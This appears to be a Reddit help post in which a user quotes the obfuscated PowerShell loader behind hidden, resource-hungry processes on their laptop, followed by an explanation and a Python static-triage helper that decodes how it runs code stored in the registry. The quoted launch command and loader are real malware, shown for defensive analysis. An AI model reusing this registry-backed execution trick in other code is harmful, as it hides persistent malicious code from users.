Cyclone Freddy death toll climbs in southern Africa

An unrelenting Cyclone Freddy that is currently battering southern Africa has killed at least 68 people in Malawi and Mozambique since it struck the continent for a second time on Saturday night, authorities in both countries have confirmed. (Mar. 14)


What does this script do?

For the past week or two, I’ve noticed that my laptop has been overheating and running slowly. When I checked Task Manager, I saw that two PowerShell instances were using up around 80% of my RAM and CPU. At first, I ran the Windows antivirus scan, but it didn’t detect any malicious files. So, I ignored it and just ended the instances whenever they appeared.

However, the problem persisted and I recently discovered that the PowerShell instances were running a script located at “C:\Windows\System32\68D0.tmp\68D1.tmp.ps1”. Here’s the PowerShell command:

"powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Windows\System32\68D0.tmp\68D1.tmp.ps1"

The 68D1.tmp.ps1 file content:

$nAQtLXMOJiHutd=[ScriptBlock]; icm ($nAQtLXMOJiHutd::Create([string]::Join('', ((gp (([regex]::Matches('VQ3y9RP0iswodniW\ERAWTFOS:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'9AfXBVLS' | % { [char]$_ }))))

I don’t know much about hacking, but it looks like some kind of base64 encoded text to me. I deleted the folder, but I’m curious about what this script does. If anyone has any insights, I’d appreciate it. Also, this is just my secondary laptop, so there aren’t any important files on it, just some study notes and lectures. Thank you!

submitted by /u/aditya_senpai396
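
The one-liner in the post is not base64: it reverses a string literal to get a registry path, reads a named value from that key with `gp` (Get-ItemProperty), turns each element into a character, and runs the joined text as a script block, so the real payload sits in the registry rather than in the .ps1 file. The following static triage helper is an added example, not part of the original post; it only parses the text of such a loader to report which registry location to inspect, and the function name `triage` and its result keys are assumptions made here.

```python
import re

# The loader line from the post, embedded as sample input.
SAMPLE = r"""$nAQtLXMOJiHutd=[ScriptBlock]; icm ($nAQtLXMOJiHutd::Create([string]::Join('', ((gp (([regex]::Matches('VQ3y9RP0iswodniW\ERAWTFOS:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'9AfXBVLS' | % { [char]$_ }))))"""

# [regex]::Matches('<literal>','.','RightToLeft') yields the characters of the
# literal from right to left, so the real string is the literal reversed.
REVERSED = re.compile(
    r"\[regex\]::Matches\(\s*'([^']*)'\s*,\s*'\.'\s*,\s*'RightToLeft'\s*\)", re.I)
# (<path expression>).'<name>' selects one property (registry value) by name.
VALUE_NAME = re.compile(r"\)\s*\.\s*'([^']+)'")
# $var=[ScriptBlock] hides the type behind a variable so that
# "[ScriptBlock]::Create" never appears literally in the file.
ALIAS_VAR = re.compile(r"\$(\w+)\s*=\s*\[ScriptBlock\]", re.I)


def triage(script: str) -> dict:
    """Statically summarise a registry-backed PowerShell loader (no execution)."""
    paths = [m.group(1)[::-1] for m in REVERSED.finditer(script)]
    name = VALUE_NAME.search(script)

    builds = bool(re.search(r"\[ScriptBlock\]::Create", script, re.I))
    alias = ALIAS_VAR.search(script)
    if alias:
        pattern = r"\$" + re.escape(alias.group(1)) + r"::Create"
        builds = builds or bool(re.search(pattern, script, re.I))

    invokes = bool(re.search(
        r"\b(icm|Invoke-Command|iex|Invoke-Expression)\b", script, re.I))
    reads_registry = bool(re.search(r"\b(gp|Get-ItemProperty)\b", script, re.I))

    return {
        "registry_paths": paths,
        "value_name": name.group(1) if name else None,
        "builds_scriptblock": builds,
        "invokes": invokes,
        "reads_registry": reads_registry,
        # All three together: code is pulled from the registry and executed.
        "registry_loader": bool(paths) and builds and invokes and reads_registry,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

Deleting the .tmp folder removes only this launcher; the registry value the helper reports, and whatever starts powershell.exe with this file, are the items to examine next.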
